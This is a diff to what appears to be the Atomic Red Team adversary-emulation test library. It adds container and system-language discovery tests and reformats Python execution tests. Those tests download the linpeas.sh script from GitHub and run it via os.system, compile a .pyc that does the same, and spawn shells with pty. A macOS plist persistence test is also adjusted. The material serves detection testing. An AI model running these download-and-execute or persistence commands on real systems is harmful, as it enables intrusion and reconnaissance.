+        prereq_command: 'which docker
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+      - description: Verify docker service is running.
+        prereq_command: 'sudo systemctl status docker  --no-pager
+
+          '
+        get_prereq_command: 'sudo systemctl start docker
+
+          '
+      executor:
+        command: |-
+          docker build -t t1613  $PathtoAtomicsFolder/T1613/src/
+          docker run --name t1613_container  -d -t t1613
+          docker ps
+          docker stats --no-stream
+          docker inspect $(docker ps -l -q --filter ancestor=t1613)
+        cleanup_command: |-
+          docker stop t1613_container
+          docker rmi -f t1613_container
+        name: sh
   T1016.001:
     technique:
       x_mitre_platforms:
@@ -89195,6 +89232,89 @@ discovery:
 
           '
         name: command_prompt
+    - name: Discover System Language with locale
+      auto_generated_guid: 837d609b-845e-4519-90ce-edc3b4b0e138
+      description: |
+        Identify System language with the `locale` command.
+
+        Upon successful execution, the output will contain the environment variables that indicate
+        the 5 character locale that can be looked up to correlate the language and territory.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'locale
+
+          '
+        name: sh
+    - name: Discover System Language with localectl
+      auto_generated_guid: 07ce871a-b3c3-44a3-97fa-a20118fdc7c9
+      description: |
+        Identify System language with the `localectl` command.
+
+        Upon successful execution, the key `System Locale` from the output will contain the
+        `LANG` environment variable that has the 5 character locale result that can be looked
+        up to correlate the language and territory.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'localectl status
+
+          '
+        name: sh
+    - name: Discover System Language by locale file
+      auto_generated_guid: 5d7057c9-2c8a-4026-91dd-13b5584daa69
+      description: |
+        Identify System language with the by reading the locale configuration file.
+
+        The locale configuration file contains the `LANG` environment variable which
+        will contain the 5 character locale that can be looked up to correlate the
+        language and territory.
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check the location of the locale configuration file.
+
+          '
+        prereq_command: "[ -f /etc/locale.conf ] || [ -f /etc/default/locale ] &&
+          exit 0 || exit 1\n"
+        get_prereq_command: 'echo "Test only valid for systems that have locale file"
+
+          '
+      executor:
+        command: "[ -f /etc/locale.conf ] && cat /etc/locale.conf || cat /etc/default/locale\n"
+        name: sh
+    - name: Discover System Language by Environment Variable Query
+      auto_generated_guid: cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a
+      description: |
+        Identify System language by checking the environment variables
+
+        Upon successful execution, the 5 character locale result can be looked up to
+        correlate the language and territory. Environment query commands are likely
+        to run with a pattern match command e.g. `env | grep LANG`
+
+        Note: `env` and `printenv` will usually provide the same results. `set` is
+        also used as a builtin command that does not generate syscall telemetry but
+        does provide a list of the environment variables.
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if printenv command exists on the machine
+
+          '
+        prereq_command: '[ -x "$(command -v printenv)" ] && exit 0 || exit 1
+
+          '
+        get_prereq_command: |
+          echo "printenv command does not exist"
+          exit 1
+      executor:
+        command: |
+          env | grep LANG
+          printenv LANG
+          set | grep LANG
+        name: sh
   T1012:
     technique:
       x_mitre_platforms:
@@ -104737,7 +104857,7 @@ exfiltration:
         time:
           description: The time in milliseconds to wait between each DNS request
           type: string
-          default: 500
+          default: '500'
         encoding:
           description: Set to '-b32' to use base32 encoding of data. Might be required
             by some DNS resolvers.

atomics/Indexes/linux-index.yaml

@@ -56362,6 +56362,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:
@@ -59105,7 +59106,90 @@ discovery:
       x_mitre_permissions_required:
       - User
       identifier: T1614.001
-    atomic_tests: []
+    atomic_tests:
+    - name: Discover System Language with locale
+      auto_generated_guid: 837d609b-845e-4519-90ce-edc3b4b0e138
+      description: |
+        Identify System language with the `locale` command.
+
+        Upon successful execution, the output will contain the environment variables that indicate
+        the 5 character locale that can be looked up to correlate the language and territory.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'locale
+
+          '
+        name: sh
+    - name: Discover System Language with localectl
+      auto_generated_guid: 07ce871a-b3c3-44a3-97fa-a20118fdc7c9
+      description: |
+        Identify System language with the `localectl` command.
+
+        Upon successful execution, the key `System Locale` from the output will contain the
+        `LANG` environment variable that has the 5 character locale result that can be looked
+        up to correlate the language and territory.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'localectl status
+
+          '
+        name: sh
+    - name: Discover System Language by locale file
+      auto_generated_guid: 5d7057c9-2c8a-4026-91dd-13b5584daa69
+      description: |
+        Identify System language with the by reading the locale configuration file.
+
+        The locale configuration file contains the `LANG` environment variable which
+        will contain the 5 character locale that can be looked up to correlate the
+        language and territory.
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check the location of the locale configuration file.
+
+          '
+        prereq_command: "[ -f /etc/locale.conf ] || [ -f /etc/default/locale ] &&
+          exit 0 || exit 1\n"
+        get_prereq_command: 'echo "Test only valid for systems that have locale file"
+
+          '
+      executor:
+        command: "[ -f /etc/locale.conf ] && cat /etc/locale.conf || cat /etc/default/locale\n"
+        name: sh
+    - name: Discover System Language by Environment Variable Query
+      auto_generated_guid: cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a
+      description: |
+        Identify System language by checking the environment variables
+
+        Upon successful execution, the 5 character locale result can be looked up to
+        correlate the language and territory. Environment query commands are likely
+        to run with a pattern match command e.g. `env | grep LANG`
+
+        Note: `env` and `printenv` will usually provide the same results. `set` is
+        also used as a builtin command that does not generate syscall telemetry but
+        does provide a list of the environment variables.
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if printenv command exists on the machine
+
+          '
+        prereq_command: '[ -x "$(command -v printenv)" ] && exit 0 || exit 1
+
+          '
+        get_prereq_command: |
+          echo "printenv command does not exist"
+          exit 1
+      executor:
+        command: |
+          env | grep LANG
+          printenv LANG
+          set | grep LANG
+        name: sh
   T1012:
     technique:
       x_mitre_platforms:

atomics/Indexes/macos-index.yaml

@@ -25215,11 +25215,11 @@ privilege-escalation:
         script_location:
           description: evil plist location
           type: path
-          default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist"
+          default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
         script_destination:
           description: Path where to move the evil plist
           type: path
-          default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist"
+          default: "/etc/emond.d/rules/atomicredteam_T1543_001.plist"
         empty_file:
           description: Random name of the empty file used to trigger emond service
           type: string
@@ -41310,11 +41310,11 @@ persistence:
         script_location:
           description: evil plist location
           type: path
-          default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist"
+          default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
         script_destination:
           description: Path where to move the evil plist
           type: path
-          default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist"
+          default: "/etc/emond.d/rules/atomicredteam_T1543_001.plist"
         empty_file:
           description: Random name of the empty file used to trigger emond service
           type: string
@@ -53914,6 +53914,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/office-365-index.yaml

@@ -50173,6 +50173,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/saas-index.yaml

@@ -50040,6 +50040,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/windows-index.yaml

@@ -73565,6 +73565,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:
@@ -92061,7 +92062,7 @@ exfiltration:
         time:
           description: The time in milliseconds to wait between each DNS request
           type: string
-          default: 500
+          default: '500'
         encoding:
           description: Set to '-b32' to use base32 encoding of data. Might be required
             by some DNS resolvers.

atomics/T1048/T1048.yaml

@@ -77,7 +77,7 @@ atomic_tests:
     time:
       description: The time in milliseconds to wait between each DNS request
       type: string
-      default: 500
+      default: "500"
     encoding:
       description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
       type: string

atomics/T1059.006/T1059.006.yaml

@@ -1,172 +1,172 @@
 attack_technique: T1059.006
 display_name: 'Command and Scripting Interpreter: Python'
-atomic_tests:
-- name: Execute shell script via python's command mode arguement
-  auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
-  description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
-  supported_platforms:
-  - linux
-  input_arguments:
-    script_url:
-      description: Shell script public URL
-      type: string
-      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-    payload_file_name:
-      description: Name of shell script downloaded from the script_url
-      type: string
-      default: T1059.006-payload
+atomic_tests: 
+  - name: Execute shell script via python's command mode arguement
+    auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+    description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
+    supported_platforms: 
+      - linux
+    input_arguments: 
+      script_url: 
+        description: Shell script public URL
+        type: string
+        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
+      payload_file_name: 
+        description: Name of shell script downloaded from the script_url
+        type: string
+        default: T1059.006-payload
+      executor: 
+        description: Linux shell
+        type: string
+        default: sh
+      script_args: 
+        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.  
+        type: string
+        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+    dependency_executor_name: sh
+    dependencies: 
+      - description: Verify if python is in the environment variable path and attempt to import requests library.
+        prereq_command: |
+          which_python=$(which python || which python3 || which python2); $which_python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: |
+          pip install requests
+    executor: 
+      command: |
+        which_python=$(which python || which python3 || which python2)
+        $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
+      name: sh
+      cleanup_command: |
+        rm #{payload_file_name}  
+  - name: 'Execute Python via scripts (Linux)'
+    auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+    description: Create Python file (.py) that downloads and executes shell script via executor arguments
+    supported_platforms: 
+      - linux
+    input_arguments: 
+      python_script_name: 
+        description: Python script name
+        type: path
+        default: T1059.006.py
+      script_url: 
+        description: Shell script public URL
+        type: string
+        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
+      payload_file_name: 
+        description: Shell script file name downloaded from the script_url
+        type: string
+        default: T1059.006-payload
+      executor: 
+        description: Payload or script interpreter / executor
+        type: string
+        default: sh
+      script_args: 
+        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
+        type: string
+        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+    dependency_executor_name: sh
+    dependencies: 
+      - description: |
+          Requires Python
+        prereq_command: |
+          which_python=$(which python || which python3 || which python2); $which_python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: |
+          pip install requests    
+    executor: 
+      command: |
+        which_python=$(which python || which python3 || which python2)
+        echo 'import requests' > #{python_script_name}
+        echo 'import os' >> #{python_script_name}
+        echo 'url = "#{script_url}"' >> #{python_script_name}
+        echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+        echo 'session = requests.session()' >> #{python_script_name}
+        echo 'source = session.get(url).content' >> #{python_script_name}
+        echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+        echo 'fd.write(source)' >> #{python_script_name}
+        echo 'fd.close()' >> #{python_script_name}
+        echo 'os.system(malicious_command)' >> #{python_script_name}
+        $which_python #{python_script_name}
+      name: sh
+      cleanup_command: |
+        rm #{python_script_name} #{payload_file_name}  
+  - name: 'Execute Python via Python executables (Linux)'
+    auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+    description: |
+      Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
+    supported_platforms: 
+      - linux
+    input_arguments: 
+      python_script_name: 
+        description: Name of Python script name
+        type: path
+        default: T1059.006.py
+      script_url: 
+        description: URL hosting external malicious payload
+        type: string
+        default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
+      payload_file_name: 
+        description: Shell script file name downloaded from the script_url
+        type: string
+        default: T1059.006-payload
+      executor: 
+        description: Payload or script interpreter / executor
+        type: string
+        default: sh
+      script_args: 
+        description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
+        type: string
+        default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
+      python_binary_name: 
+        description: Name of Python file to be compiled
+        type: path
+        default: T1059.006.pyc
+    dependency_executor_name: sh
+    dependencies: 
+      - description: |
+          Requires Python
+        prereq_command: |
+          which_python=$(which python || which python3 || which python2); $which_python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?
+        get_prereq_command: |
+          pip install requests    
+    executor: 
+      command: |
+        which_python=$(which python || which python3 || which python2)
+        echo 'import requests' > #{python_script_name}
+        echo 'import os' >> #{python_script_name}
+        echo 'url = "#{script_url}"' >> #{python_script_name}
+        echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
+        echo 'session = requests.session()' >> #{python_script_name}
+        echo 'source = session.get(url).content' >> #{python_script_name}
+        echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
+        echo 'fd.write(source)' >> #{python_script_name}
+        echo 'fd.close()' >> #{python_script_name}
+        echo 'os.system(malicious_command)' >> #{python_script_name}
+        $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
+        $which_python #{python_binary_name}
+      name: sh
+      cleanup_command: |
+        rm #{python_binary_name} #{python_script_name} #{payload_file_name}
+  - name: 'Python pty module and spawn function used to spawn sh or bash'
+    auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
+    description: |
+      Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
+    supported_platforms:
+    - linux
+    dependencies: 
+      - description: |
+          Verify if python is in the environment variable path and attempt to import requests library.
+        prereq_command: |
+          which_python=$(which python || which python3 || which python2); $which_python -V
+          $which_python -c 'import requests' 2>/dev/null; echo $?          
+        get_prereq_command: |
+          pip install requests
     executor:
-      description: Linux shell
-      type: string
-      default: sh
-    script_args:
-      description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files.
-      type: string
-      default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
-  dependency_executor_name: sh
-  dependencies:
-  - description: Verify if python is in the environment variable path and attempt to import requests library.
-    prereq_command: |
-      which_python=$(which python || which python3 || which python2); $which_python -V
-      $which_python -c 'import requests' 2>/dev/null; echo $?
-    get_prereq_command: |
-      pip install requests
-  executor:
-    command: |
-      which_python=$(which python || which python3 || which python2)
-      $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
-    name: sh
-    cleanup_command: |
-      rm #{payload_file_name}  
-- name: 'Execute Python via scripts (Linux)'
-  auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
-  description: Create Python file (.py) that downloads and executes shell script via executor arguments
-  supported_platforms:
-  - linux
-  input_arguments:
-    python_script_name:
-      description: Python script name
-      type: path
-      default: T1059.006.py
-    script_url:
-      description: Shell script public URL
-      type: string
-      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-    payload_file_name:
-      description: Shell script file name downloaded from the script_url
-      type: string
-      default: T1059.006-payload
-    executor:
-      description: Payload or script interpreter / executor
-      type: string
-      default: sh
-    script_args:
-      description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
-      type: string
-      default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Requires Python
-    prereq_command: |
-      which_python=$(which python || which python3 || which python2); $which_python -V
-      $which_python -c 'import requests' 2>/dev/null; echo $?
-    get_prereq_command: |
-      pip install requests    
-  executor:
-    command: |
-      which_python=$(which python || which python3 || which python2)
-      echo 'import requests' > #{python_script_name}
-      echo 'import os' >> #{python_script_name}
-      echo 'url = "#{script_url}"' >> #{python_script_name}
-      echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
-      echo 'session = requests.session()' >> #{python_script_name}
-      echo 'source = session.get(url).content' >> #{python_script_name}
-      echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
-      echo 'fd.write(source)' >> #{python_script_name}
-      echo 'fd.close()' >> #{python_script_name}
-      echo 'os.system(malicious_command)' >> #{python_script_name}
-      $which_python #{python_script_name}
-    name: sh
-    cleanup_command: |
-      rm #{python_script_name} #{payload_file_name}  
-- name: 'Execute Python via Python executables (Linux)'
-  auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
-  description: |
-    Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
-  supported_platforms:
-  - linux
-  input_arguments:
-    python_script_name:
-      description: Name of Python script name
-      type: path
-      default: T1059.006.py
-    script_url:
-      description: URL hosting external malicious payload
-      type: string
-      default: https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh
-    payload_file_name:
-      description: Shell script file name downloaded from the script_url
-      type: string
-      default: T1059.006-payload
-    executor:
-      description: Payload or script interpreter / executor
-      type: string
-      default: sh
-    script_args:
-      description: Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files
-      type: string
-      default: -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles
-    python_binary_name:
-      description: Name of Python file to be compiled
-      type: path
-      default: T1059.006.pyc
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Requires Python
-    prereq_command: |
-      which_python=$(which python || which python3 || which python2); $which_python -V
-      $which_python -c 'import requests' 2>/dev/null; echo $?
-    get_prereq_command: |
-      pip install requests    
-  executor:
-    command: |
-      which_python=$(which python || which python3 || which python2)
-      echo 'import requests' > #{python_script_name}
-      echo 'import os' >> #{python_script_name}
-      echo 'url = "#{script_url}"' >> #{python_script_name}
-      echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
-      echo 'session = requests.session()' >> #{python_script_name}
-      echo 'source = session.get(url).content' >> #{python_script_name}
-      echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
-      echo 'fd.write(source)' >> #{python_script_name}
-      echo 'fd.close()' >> #{python_script_name}
-      echo 'os.system(malicious_command)' >> #{python_script_name}
-      $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
-      $which_python #{python_binary_name}
-    name: sh
-    cleanup_command: |
-      rm #{python_binary_name} #{python_script_name} #{payload_file_name}
-- name: 'Python pty module and spawn function used to spawn sh or bash'
-  auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
-  description: |
-    Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
-  supported_platforms:
-  - linux
-  dependencies:
-  - description: |
-      Verify if python is in the environment variable path and attempt to import requests library.
-    prereq_command: |
-      which_python=$(which python || which python3 || which python2); $which_python -V
-      $which_python -c 'import requests' 2>/dev/null; echo $?          
-    get_prereq_command: |
-      pip install requests
-  executor:
-    command: |-
-      which_python=$(which python || which python3 || which python2)
-      $which_python -c "import pty;pty.spawn('/bin/sh')"
-      exit
-      $which_python -c "import pty;pty.spawn('/bin/bash')"
-      exit
-    name: bash
+      command: |-
+        which_python=$(which python || which python3 || which python2)
+        $which_python -c "import pty;pty.spawn('/bin/sh')"
+        exit
+        $which_python -c "import pty;pty.spawn('/bin/bash')"
+        exit
+      name: bash

atomics/T1543.001/T1543.001.md

@@ -83,8 +83,8 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist|
-| script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist|
+| script_location | evil plist location | path | $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist|
+| script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1543_001.plist|
 | empty_file | Random name of the empty file used to trigger emond service | string | randomflag|
 
 

atomics/T1543.001/T1543.001.yaml

@@ -45,11 +45,11 @@ atomic_tests:
     script_location:
       description: evil plist location
       type: path
-      default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist
+      default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist
     script_destination:
       description: Path where to move the evil plist
       type: path
-      default: /etc/emond.d/rules/atomicredteam_T1053_004.plist
+      default: /etc/emond.d/rules/atomicredteam_T1543_001.plist
     empty_file:
       description: Random name of the empty file used to trigger emond service
       type: string

atomics/T1613/T1613.md

@@ -0,0 +1,69 @@
+# T1613 - Container and Resource Discovery
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1613)
+<blockquote>Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
+
+These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Container and ResourceDiscovery](#atomic-test-1---container-and-resourcediscovery)
+
+
+<br/>
+
+## Atomic Test #1 - Container and ResourceDiscovery
+Adversaries may attempt to discover containers and other resources that are available within a containers environment.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 8a895923-f99f-4668-acf2-6cc59a44f05e
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+docker build -t t1613  $PathtoAtomicsFolder/T1613/src/
+docker run --name t1613_container  -d -t t1613
+docker ps
+docker stats --no-stream
+docker inspect $(docker ps -l -q --filter ancestor=t1613)
+```
+
+#### Cleanup Commands:
+```sh
+docker stop t1613_container
+docker rmi -f t1613_container
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Verify docker is installed.
+##### Check Prereq Commands:
+```sh
+which docker
+```
+##### Get Prereq Commands:
+```sh
+if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+```
+##### Description: Verify docker service is running.
+##### Check Prereq Commands:
+```sh
+sudo systemctl status docker  --no-pager
+```
+##### Get Prereq Commands:
+```sh
+sudo systemctl start docker
+```
+
+
+
+
+<br/>

atomics/T1613/T1613.yaml

@@ -0,0 +1,33 @@
+---
+attack_technique: T1613
+display_name: "Container and Resource Discovery"
+atomic_tests:
+- name: Container and ResourceDiscovery
+  auto_generated_guid: 8a895923-f99f-4668-acf2-6cc59a44f05e
+  description: Adversaries may attempt to discover containers and other resources that are available within a containers environment. 
+  supported_platforms:
+  - containers
+  dependency_executor_name: sh
+  dependencies: 
+  - description: Verify docker is installed.
+    prereq_command: |
+      which docker
+    get_prereq_command: |
+      if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+  
+  - description: Verify docker service is running.
+    prereq_command: |
+      sudo systemctl status docker  --no-pager
+    get_prereq_command: |
+      sudo systemctl start docker
+  executor:
+    command: |-
+      docker build -t t1613  $PathtoAtomicsFolder/T1613/src/
+      docker run --name t1613_container  -d -t t1613
+      docker ps
+      docker stats --no-stream
+      docker inspect $(docker ps -l -q --filter ancestor=t1613)
+    cleanup_command: |-
+      docker stop t1613_container
+      docker rmi -f t1613_container
+    name: sh

atomics/T1613/src/Dockerfile

@@ -0,0 +1,4 @@
+FROM ubuntu:20.04
+MAINTAINER Group12
+RUN echo "Group 12"
+ENTRYPOINT ["tail", "-f", "/dev/null"]

atomics/T1614.001/T1614.001.md

@@ -14,6 +14,14 @@ On a macOS or Linux system, adversaries may query <code>locale</code> to retriev
 
 - [Atomic Test #2 - Discover System Language with chcp](#atomic-test-2---discover-system-language-with-chcp)
 
+- [Atomic Test #3 - Discover System Language with locale](#atomic-test-3---discover-system-language-with-locale)
+
+- [Atomic Test #4 - Discover System Language with localectl](#atomic-test-4---discover-system-language-with-localectl)
+
+- [Atomic Test #5 - Discover System Language by locale file](#atomic-test-5---discover-system-language-by-locale-file)
+
+- [Atomic Test #6 - Discover System Language by Environment Variable Query](#atomic-test-6---discover-system-language-by-environment-variable-query)
+
 
 <br/>
 
@@ -74,4 +82,162 @@ chcp
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Discover System Language with locale
+Identify System language with the `locale` command.
+
+Upon successful execution, the output will contain the environment variables that indicate
+the 5 character locale that can be looked up to correlate the language and territory.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 837d609b-845e-4519-90ce-edc3b4b0e138
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+locale
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Discover System Language with localectl
+Identify System language with the `localectl` command.
+
+Upon successful execution, the key `System Locale` from the output will contain the
+`LANG` environment variable that has the 5 character locale result that can be looked
+up to correlate the language and territory.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 07ce871a-b3c3-44a3-97fa-a20118fdc7c9
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+localectl status
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Discover System Language by locale file
+Identify System language with the by reading the locale configuration file.
+
+The locale configuration file contains the `LANG` environment variable which
+will contain the 5 character locale that can be looked up to correlate the
+language and territory.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 5d7057c9-2c8a-4026-91dd-13b5584daa69
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+[ -f /etc/locale.conf ] && cat /etc/locale.conf || cat /etc/default/locale
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check the location of the locale configuration file.
+##### Check Prereq Commands:
+```sh
+[ -f /etc/locale.conf ] || [ -f /etc/default/locale ] && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+echo "Test only valid for systems that have locale file"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Discover System Language by Environment Variable Query
+Identify System language by checking the environment variables
+
+Upon successful execution, the 5 character locale result can be looked up to
+correlate the language and territory. Environment query commands are likely
+to run with a pattern match command e.g. `env | grep LANG`
+
+Note: `env` and `printenv` will usually provide the same results. `set` is
+also used as a builtin command that does not generate syscall telemetry but
+does provide a list of the environment variables.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+env | grep LANG
+printenv LANG
+set | grep LANG
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if printenv command exists on the machine
+##### Check Prereq Commands:
+```sh
+[ -x "$(command -v printenv)" ] && exit 0 || exit 1
+```
+##### Get Prereq Commands:
+```sh
+echo "printenv command does not exist"
+exit 1
+```
+
+
+
+
 <br/>

atomics/T1614.001/T1614.001.yaml

@@ -24,4 +24,82 @@ atomic_tests:
   executor:
     command: |
       chcp
-    name: command_prompt
+    name: command_prompt
+- name: Discover System Language with locale
+  auto_generated_guid: 837d609b-845e-4519-90ce-edc3b4b0e138
+  description: |
+    Identify System language with the `locale` command.
+
+    Upon successful execution, the output will contain the environment variables that indicate
+    the 5 character locale that can be looked up to correlate the language and territory.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      locale
+    name: sh
+- name: Discover System Language with localectl
+  auto_generated_guid: 07ce871a-b3c3-44a3-97fa-a20118fdc7c9
+  description: |
+    Identify System language with the `localectl` command.
+
+    Upon successful execution, the key `System Locale` from the output will contain the
+    `LANG` environment variable that has the 5 character locale result that can be looked
+    up to correlate the language and territory.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      localectl status
+    name: sh
